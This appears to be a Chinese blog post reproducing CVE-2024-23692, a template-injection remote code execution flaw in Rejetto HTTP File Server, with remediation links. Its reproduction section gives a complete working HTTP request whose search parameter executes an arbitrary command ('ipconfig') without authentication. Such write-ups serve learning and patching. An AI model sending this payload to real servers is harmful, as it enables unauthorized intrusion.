Rejetto HTTP File Server代码执行漏洞(CVE-2024-23692)
0x00写在前面
本次测试仅供学习使用,如若非法他用,与本博客和发布者无关,需自行负责!
0x01漏洞介绍
Rejetto HTTP File Server(Rejetto HFS)是Rejetto公司的一款 HTTP 文件服务器。
Rejetto HTTP File Server 2.3m及之前版本存在安全漏洞,该漏洞源于存在模板注入漏洞,允许远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。
0x02影响版本
Rejetto HTTP File Server 2.3m及之前版本
0x03漏洞复现
1.访问漏洞环境
_副本-qouv.png)
2.对漏洞进行复现
POC
漏洞复现
GET /?n=%0A&cmd=ipconfig&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: 172.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflateipconfig命令执行成功
_副本-casx.png)
3.Yakit工具加载nuclei文件测试(漏洞存在)
_副本-udpr.png)
0x04修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://www.rejetto.com/hfs/?f=dl
https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/#/
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
阅读建议
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果
